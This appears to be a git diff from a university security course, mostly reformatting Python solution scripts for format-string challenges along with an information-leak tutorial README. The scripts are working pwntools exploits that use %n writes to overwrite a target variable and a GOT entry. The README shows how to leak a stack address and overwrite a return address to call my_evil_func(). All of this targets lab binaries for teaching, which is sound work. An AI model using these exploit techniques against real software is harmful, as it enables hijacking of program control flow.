a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/helper_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/helper_format1.py @@ -4,16 +4,16 @@ # Run with: # python helper_format1.py | grep -va 'rocess' | grep -aP '.*?AAAABBBBCCCCDDDD.*?4[1234]' | grep -aP '4[1234]' -e = ELF('./format1') +e = ELF("./format1") -for i in range(1,1000): - # The spaces are needed in order to properly align the format string - # in 4B blocks - as the arguments for printf are treated as each being - # 4B. If you delete some spaces you will notice that it starts being off - payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i+1) + "$x" +for i in range(1, 1000): + # The spaces are needed in order to properly align the format string + # in 4B blocks - as the arguments for printf are treated as each being + # 4B. If you delete some spaces you will notice that it starts being off + payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i + 1) + "$x" - p = process(["./format1", payload]) + p = process(["./format1", payload]) - print("%d %s"% (i, p.read())) + print("%d %s" % (i, p.read())) - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format1.py index c0b16cc..2c6cdd2 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format1.py @@ -7,23 +7,30 @@ # the stack head varies between runs. 
We use helper_format1.py # to determine where it might reside -e = ELF('./format1', checksec=False) - -target_offset = e.symbols['target'] +e = ELF("./format1", checksec=False) + +target_offset = e.symbols["target"] # This number is found using helper_format1.py position = 256 for i in range(1000): - payload = "AAAABBBB" + p32(target_offset) + "DDDD %" + str(position) + "$n%" + str(position+1) + "$x" + payload = ( + "AAAABBBB" + + p32(target_offset) + + "DDDD %" + + str(position) + + "$n%" + + str(position + 1) + + "$x" + ) - p = process(["./format1", payload]) + p = process(["./format1", payload]) - try: - print("%s"% (p.read())) - break - except EOFError: - pass - + try: + print("%s" % (p.read())) + break + except EOFError: + pass - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format3.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format3.py index 37682da..99e3391 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format3.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format3.py @@ -2,11 +2,16 @@ from pwn import * import sys -e = ELF('./format3', checksec=False) - -target_addr = int(e.symbols['target']) +e = ELF("./format3", checksec=False) -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +target_addr = int(e.symbols["target"]) + +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) payload += "%52x" + "%12$n" + "%17x" + "%13$n" + "%173x" + "%14$n" print(payload) diff --git 
a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format4.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format4.py index 0e12a4d..757cf87 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format4.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format4.py @@ -6,50 +6,58 @@ # could be shorter. The reason it is so long is because it takes into # account the fact that the address for the 'hello' function could change + # Helper function to extract one byte from an integer # ex. extract_byte(0xaabbccdd, 0) => 0xdd # ex. extract_byte(0xaabbccdd, 2) => 0xbb def extract_byte(value, pos): - return (value >> (pos * 8)) % 256 + return (value >> (pos * 8)) % 256 + def get_byte_padding(current, wanted): - # Fuction is supposed to only give paddings for one byte - wanted %= 256 - current %= 256 - - # Printing a hex value with less than 8 padding can - # print variable number of digits. We need to be sure - # how many digits we print - if wanted - 8 >= current: - return wanted - current - else: - return wanted + 256 - current - -e = ELF('./format4', checksec=False) - -target_addr = int(e.symbols['got.exit']) -hello_addr = int(e.symbols['hello']) + # Function is supposed to only give paddings for one byte + wanted %= 256 + current %= 256 + + # Printing a hex value with less than 8 padding can + # print variable number of digits.
We need to be sure + # how many digits we print + if wanted - 8 >= current: + return wanted - current + else: + return wanted + 256 - current + + +e = ELF("./format4", checksec=False) + +target_addr = int(e.symbols["got.exit"]) +hello_addr = int(e.symbols["hello"]) # Position on the stack where the arguments will be pos = 4 -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) bytes_printed = len(payload) + 1 next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 0)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 1)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 1)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 1) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 2)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 2)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 2) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 3)) -payload += "%" + str(next_padding) + "x %" + str(pos + 3)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 3) + "$n" print(payload) @@ -58,4 +66,3 @@ def get_byte_padding(current, wanted): # p.sendline(payload) # print(p.read()) # p.close() - diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/helper_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/helper_format1.py index 5804e05..2191924 100755 --- 
a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/helper_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/helper_format1.py @@ -4,16 +4,16 @@ # Run with: # python helper_format1.py | grep -va 'rocess' | grep -aP '.*?AAAABBBBCCCCDDDD.*?4[1234]' | grep -aP '4[1234]' -e = ELF('./format1') +e = ELF("./format1") -for i in range(1,1000): - # The spaces are needed in order to properly align the format string - # in 4B blocks - as the arguments for printf are treated as each being - # 4B. If you delete some spaces you will notice that it starts being off - payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i+1) + "$x" +for i in range(1, 1000): + # The spaces are needed in order to properly align the format string + # in 4B blocks - as the arguments for printf are treated as each being + # 4B. If you delete some spaces you will notice that it starts being off + payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i + 1) + "$x" - p = process(["./format1", payload]) + p = process(["./format1", payload]) - print("%d %s"% (i, p.read())) + print("%d %s" % (i, p.read())) - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format1.py index c0b16cc..2c6cdd2 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format1.py @@ -7,23 +7,30 @@ # the stack head varies between runs. 
We use helper_format1.py # to determine where it might reside -e = ELF('./format1', checksec=False) - -target_offset = e.symbols['target'] +e = ELF("./format1", checksec=False) + +target_offset = e.symbols["target"] # This number is found using helper_format1.py position = 256 for i in range(1000): - payload = "AAAABBBB" + p32(target_offset) + "DDDD %" + str(position) + "$n%" + str(position+1) + "$x" + payload = ( + "AAAABBBB" + + p32(target_offset) + + "DDDD %" + + str(position) + + "$n%" + + str(position + 1) + + "$x" + ) - p = process(["./format1", payload]) + p = process(["./format1", payload]) - try: - print("%s"% (p.read())) - break - except EOFError: - pass - + try: + print("%s" % (p.read())) + break + except EOFError: + pass - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format3.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format3.py index 37682da..99e3391 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format3.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format3.py @@ -2,11 +2,16 @@ from pwn import * import sys -e = ELF('./format3', checksec=False) - -target_addr = int(e.symbols['target']) +e = ELF("./format3", checksec=False) -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +target_addr = int(e.symbols["target"]) + +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) payload += "%52x" + "%12$n" + "%17x" + "%13$n" + "%173x" + "%14$n" print(payload) diff --git 
a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format4.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format4.py index 0e12a4d..757cf87 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format4.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format4.py @@ -6,50 +6,58 @@ # could be shorter. The reason it is so long is because it takes into # account the fact that the address for the 'hello' function could change + # Helper function to extract one byte from an integer # ex. extract_byte(0xaabbccdd, 0) => 0xdd # ex. extract_byte(0xaabbccdd, 2) => 0xbb def extract_byte(value, pos): - return (value >> (pos * 8)) % 256 + return (value >> (pos * 8)) % 256 + def get_byte_padding(current, wanted): - # Fuction is supposed to only give paddings for one byte - wanted %= 256 - current %= 256 - - # Printing a hex value with less than 8 padding can - # print variable number of digits. We need to be sure - # how many digits we print - if wanted - 8 >= current: - return wanted - current - else: - return wanted + 256 - current - -e = ELF('./format4', checksec=False) - -target_addr = int(e.symbols['got.exit']) -hello_addr = int(e.symbols['hello']) + # Function is supposed to only give paddings for one byte + wanted %= 256 + current %= 256 + + # Printing a hex value with less than 8 padding can + # print variable number of digits.
We need to be sure + # how many digits we print + if wanted - 8 >= current: + return wanted - current + else: + return wanted + 256 - current + + +e = ELF("./format4", checksec=False) + +target_addr = int(e.symbols["got.exit"]) +hello_addr = int(e.symbols["hello"]) # Position on the stack where the arguments will be pos = 4 -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) bytes_printed = len(payload) + 1 next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 0)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 1)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 1)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 1) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 2)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 2)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 2) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 3)) -payload += "%" + str(next_padding) + "x %" + str(pos + 3)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 3) + "$n" print(payload) @@ -58,4 +66,3 @@ def get_byte_padding(current, wanted): # p.sendline(payload) # print(p.read()) # p.close() - diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/helper_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/helper_format1.py index 5804e05..2191924 100755 --- 
a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/helper_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/helper_format1.py @@ -4,16 +4,16 @@ # Run with: # python helper_format1.py | grep -va 'rocess' | grep -aP '.*?AAAABBBBCCCCDDDD.*?4[1234]' | grep -aP '4[1234]' -e = ELF('./format1') +e = ELF("./format1") -for i in range(1,1000): - # The spaces are needed in order to properly align the format string - # in 4B blocks - as the arguments for printf are treated as each being - # 4B. If you delete some spaces you will notice that it starts being off - payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i+1) + "$x" +for i in range(1, 1000): + # The spaces are needed in order to properly align the format string + # in 4B blocks - as the arguments for printf are treated as each being + # 4B. If you delete some spaces you will notice that it starts being off + payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i + 1) + "$x" - p = process(["./format1", payload]) + p = process(["./format1", payload]) - print("%d %s"% (i, p.read())) + print("%d %s" % (i, p.read())) - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format1.py index c0b16cc..2c6cdd2 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format1.py @@ -7,23 +7,30 @@ # the stack head varies between runs. 
We use helper_format1.py # to determine where it might reside -e = ELF('./format1', checksec=False) - -target_offset = e.symbols['target'] +e = ELF("./format1", checksec=False) + +target_offset = e.symbols["target"] # This number is found using helper_format1.py position = 256 for i in range(1000): - payload = "AAAABBBB" + p32(target_offset) + "DDDD %" + str(position) + "$n%" + str(position+1) + "$x" + payload = ( + "AAAABBBB" + + p32(target_offset) + + "DDDD %" + + str(position) + + "$n%" + + str(position + 1) + + "$x" + ) - p = process(["./format1", payload]) + p = process(["./format1", payload]) - try: - print("%s"% (p.read())) - break - except EOFError: - pass - + try: + print("%s" % (p.read())) + break + except EOFError: + pass - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format3.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format3.py index 37682da..99e3391 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format3.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format3.py @@ -2,11 +2,16 @@ from pwn import * import sys -e = ELF('./format3', checksec=False) - -target_addr = int(e.symbols['target']) +e = ELF("./format3", checksec=False) -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +target_addr = int(e.symbols["target"]) + +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) payload += "%52x" + "%12$n" + "%17x" + "%13$n" + "%173x" + "%14$n" print(payload) diff --git 
a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format4.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format4.py index 0e12a4d..25efc8f 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format4.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format4.py @@ -6,50 +6,58 @@ # could be shorter. The reason it is so long is because it takes into # account the fact that the address for the 'hello' function could change + # Helper function to extract one byte from an integer # ex. extract_byte(0xaabbccdd, 0) => 0xdd # ex. extract_byte(0xaabbccdd, 2) => 0xbb def extract_byte(value, pos): - return (value >> (pos * 8)) % 256 + return (value >> (pos * 8)) % 256 + def get_byte_padding(current, wanted): - # Fuction is supposed to only give paddings for one byte - wanted %= 256 - current %= 256 - - # Printing a hex value with less than 8 padding can - # print variable number of digits. We need to be sure - # how many digits we print - if wanted - 8 >= current: - return wanted - current - else: - return wanted + 256 - current - -e = ELF('./format4', checksec=False) - -target_addr = int(e.symbols['got.exit']) -hello_addr = int(e.symbols['hello']) + # Function is supposed to only give paddings for one byte + wanted %= 256 + current %= 256 + + # Printing a hex value with less than 8 padding can + # print variable number of digits. 
We need to be sure + # how many digits we print + if wanted - 8 >= current: + return wanted - current + else: + return wanted + 256 - current + + +e = ELF("./format4", checksec=False) + +target_addr = int(e.symbols["got.exit"]) +hello_addr = int(e.symbols["hello"]) # Position on the stack where the arguments will be pos = 4 -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) bytes_printed = len(payload) + 1 next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 0)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 1)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 1)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 1) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 2)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 2)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 2) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 3)) -payload += "%" + str(next_padding) + "x %" + str(pos + 3)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 3) + "$n" print(payload) @@ -58,4 +66,3 @@ def get_byte_padding(current, wanted): # p.sendline(payload) # print(p.read()) # p.close() - diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/helper_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/helper_format1.py index 5804e05..2191924 100755 --- 
a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/helper_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/helper_format1.py @@ -4,16 +4,16 @@ # Run with: # python helper_format1.py | grep -va 'rocess' | grep -aP '.*?AAAABBBBCCCCDDDD.*?4[1234]' | grep -aP '4[1234]' -e = ELF('./format1') +e = ELF("./format1") -for i in range(1,1000): - # The spaces are needed in order to properly align the format string - # in 4B blocks - as the arguments for printf are treated as each being - # 4B. If you delete some spaces you will notice that it starts being off - payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i+1) + "$x" +for i in range(1, 1000): + # The spaces are needed in order to properly align the format string + # in 4B blocks - as the arguments for printf are treated as each being + # 4B. If you delete some spaces you will notice that it starts being off + payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i + 1) + "$x" - p = process(["./format1", payload]) + p = process(["./format1", payload]) - print("%d %s"% (i, p.read())) + print("%d %s" % (i, p.read())) - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md b/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md index ca605f4..15a3076 100644 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md @@ -1,668 +1,678 @@ ---- -linkTitle: Information Leaks -type: docs -weight: 10 ---- - -# Information Leaks - ------ - - -## Introduction ------ -#### Objectives & Rationale - -This is a tutorial based lab. Throughout this lab you will learn about frequent errors that occur when handling strings. This tutorial is focused on the C language. 
Generally, OOP languages (like Java, C\#,C++) are using classes to represent strings -- this simplifies the way strings are handled and decreases the frequency of programming errors. - - - -#### What is a string? - -Conceptually, a string is sequence of characters. The representation of a string can be done in multiple ways. One of the way is to represent a string as a contiguous memory buffer. Each character is **encoded** in a way. For example the **ASCII** encoding uses 7-bit integers to encode each character -- because it is more convenient to store 8-bits at a time in a byte, an ASCII character is stored in one byte. - -The type for representing an ASCII character in C is `char` and it uses one byte. As a side note, `sizeof(char) == 1` is the only guarantee that the [C standard](http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf "http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf") gives. - -Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). The idea is that in order to represent an Unicode string, **more than one** byte is needed for **one** character. `char16_t`, `char32_t` were introduced in the C standard to represent these strings. The C language also has another type, called `wchar_t`, which is implementation defined and should not be used to represent Unicode characters. - -Our tutorial will focus on ASCII strings, where each character is represented in one byte. We will show a few examples of what happens when one calls *string manipulation functions* that are assuming a specific encoding of the string. - - -You will find extensive information on ASCII in the [ascii man page](http://man7.org/linux/man-pages/man7/ascii.7.html "http://man7.org/linux/man-pages/man7/ascii.7.html"). - -Inside an Unix terminal issue the command - -``` {.code .bash} -man ascii -``` - - -### Length management ------------------ - - -In C, the length of an ASCII string is given by its contents. 
An ASCII string ends with a `0` value byte called the `NUL` byte. Every `str*` function (i.e. a function with the name starting with `str`, such as `strcpy`, `strcat`, `strdup`, `strstr` etc.) uses this `0` byte to detect where the string ends. As a result, not ending strings in `0` and using `str*` functions leads to vulnerabilities. - -### 1. Basic Info Leak (tutorial) - - -Enter the `01-basic-info-leak/` subfolder. It\'s a basic information leak example. - -In `basic_info_leak.c`, `buf` is supplied as input, hence is not trusted. We should be careful with this buffer. If the user gives `32` bytes as input then `strcpy` will copy bytes in `my_string` until it finds a `NUL` byte (`0x00`). Because the [stack grows down](/courses/cns/labs/lab-05 "cns:labs:lab-05"), on most -platforms, we will start accessing the content of the stack. After the `buf` variable the stack stores the `old rbp`, the function return address and then the function parameters. This information is copied into `my_string`. As such, printing information in `my_string` (after byte index `32`) using `puts()` results in information leaks. - -We can test this using: - -``` {.code} -$ python -c 'print("A"*32)' | ./basic_info_leak -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�8� -``` - -In order to check the hexadecimal values of the leak, we pipe the output -through `xxd`: - -``` {.code} -$ python -c 'print("A"*32)' | ./basic_info_leak | xxd -00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000020: d066 57b4 fc7f 0a .fW.... -``` - -We have leaked one value above: - -the lower non-0 bytes of the old/stored `rbp` value (right after the buffer): `0x7ffcb45766d0` (it\'s a little endian architecture); it will differ on your system - -The return address usually doesn\'t change (except for executables with PIE, *Position Independent Executable* support). But assuming ASLR is enabled, the `rbp` value changes at each run. 
If we leak it we have a basic address that we can toy around to leak or overwrite other values. We\'ll see more of that in the [Information Leak](#p_information_leak "cns:labs:lab-07 ↵") task. - - -### 2. Information Leak - - -We will now show how improper string handling will lead to information leaks from the memory. For this, please access the `02-info-leak/` subfolder. Please browse the `info-leak.c` source code file. - -The snippet below is the relevant code snippet. The goal is to call the `my_evil_func()` function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the `my_evil_func()` function by overriding the return address of the `my_main()` function: - -``` -#define NAME_SZ 32 -  -static void read_name(char *name) -{ - memset(name, 0, NAME_SZ); - read(0, name, NAME_SZ); - //name[NAME_SZ-1] = 0; -} -  -static void my_main(void) -{ - char name[NAME_SZ]; -  - read_name(name); - printf("hello %s, what address to modify and with what value?\n", name); - fflush(stdout); - my_memory_write(); - printf("Returning from main!\n"); -} -``` - -What catches our eye is that the `read()` function call in the `read_name()` function read **exactly** `32` bytes. If we provide it `32` bytes it won\'t be null-terminated and will result in an information leak when `printf()` is called in the `my_main()` function. - - -#### Exploiting the memory write using the info leak {#exploiting_the_memory_write_using_the_info_leak} - - -Let\'s first try to see how the program works: - -``` -$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak -hello AAAAAAAAAA, what address to modify and with what value? 
-``` - -The binary wants an input from the user using the `read()` library call as we can see below: - -``` -$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak -read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512 -read(0, "AAAAAAAAAA", 32) = 10 -hello AAAAAAAAAA, what address to modify and with what value? -read(0, "", 4) = 0 -+++ exited with 255 +++ -``` - -The input is read using the `read()` system call. The first read expects 32 bytes. You can see already that there\'s another `read()` call. That one is the first `read()` call in the `my_memory_write()` function. - -As noted above, if we use exactly `32` bytes for name we will end up with a non-null-terminated string, leading to an information leak. Let\'s see how that goes: - -``` -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak -hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value? -  -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd -00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141 hello AAAAAAAAAA -00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh -00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f at address to mo -00000040: 6469 6679 2061 6e64 2077 6974 6820 7768 dify and with wh -00000050: 6174 2076 616c 7565 3f0a at value?. -``` - -We see we have an information leak. We leak one piece of data above: `0x7fffffffdcf0`. If we run multiple times we can see that the values for the first piece of information differs: - -``` {.code .bash} -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ',' -00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh -``` - -The variable part is related to a stack address (it starts with `0x7f`); it varies because ASLR is enabled. 
We want to look more carefully using GDB and figure out what the variable value represents: - -``` {.code .bash} -$ gdb -q ./info_leak -Reading symbols from ./info_leak...done. -gdb-peda$ b my_main -Breakpoint 1 at 0x400560 -gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")') -Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")') -[...] -  -# Do next instructions until after the call to printf. -gdb-peda$ ni -.... -  -gdb-peda$ x/12g name -0x7fffffffdc20: 0x4141414141414141 0x4141414141414141 -0x7fffffffdc30: 0x4141414141414141 0x4141414141414141 -0x7fffffffdc40: 0x00007fffffffdc50 0x00000000004007aa -gdb-peda$ x/2i 0x004007aa - 0x4007aa : mov edi,0x4008bc - 0x4007af : call 0x400550 -gdb-peda$ pdis main -Dump of assembler code for function main: - 0x00000000004007a1 <+0>: push rbp - 0x00000000004007a2 <+1>: mov rbp,rsp - 0x00000000004007a5 <+4>: call 0x400756 - 0x00000000004007aa <+9>: mov edi,0x4008bc - 0x00000000004007af <+14>: call 0x400550 - 0x00000000004007b4 <+19>: mov eax,0x0 - 0x00000000004007b9 <+24>: pop rbp - 0x00000000004007ba <+25>: ret -End of assembler dump. -gdb-peda$ -``` - -From the GDB above, we determine that, after our buffer, there is the stored `rbp` (i.e. old rbp). - - -In 32-bit program there would (usually) be 2 leaked values: - -- The old `ebp` - - -- The return address of the function - - -This happens if the values of the old `ebp` and the return address don\'t have any `\x00` bytes. - -in the 64-bit example we only get the old `rbp` because the 2 high bytes of the stack address are always `0` which causes the string to be terminated early. - - -When we leak the two values we are able to retrieve the stored `rbp` value. In the above run the value of `rbp` is `0x00007fffffffdc50`. We also see that the stored `rbp` value is stored at **address** `0x7fffffffdc40`, which is the address current `rbp`. 
We have the situation in the below diagram: - -![](https://ocw.cs.pub.ro/courses/_media/cns/labs/info-leak-stack-64.png) - -We marked the stored `rbp` value (i.e. the frame pointer for `main()`: `0x7fffffffdc50`) with the font color red in both places. - -In short, if we leak the value of the stored `rbp` (i.e. the frame pointer for `main()`: `0x00007fffffffdc50`) we can determine the address of the current `rbp` (i.e. the frame pointer for `my_main()`: `0x7fffffffdc40`), by subtracting `16`. The address where the -`my_main()` return address is stored (`0x7fffffffdc48`) is computed by subtracting `8` from the leaked `rbp` value. By overwriting the value at this address we will force an arbitrary code execution and call `my_evil_func()`. - -In order to write the return address of the `my_main()` function with the address of the `my_evil_func()` function, make use of the -conveniently (but not realistically) placed `my_memory_write()` function. The `my_memory_write()` allows the user to write arbitrary -values to arbitrary memory addresses. - -Considering all of this, update the `TODO` lines of the `exploit.py` script to make it call the `my_evil_func()` function. - - -Same as above, use `nm` to determine address of the `my_evil_func()` function. When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). - - - -Use the above logic to determine the 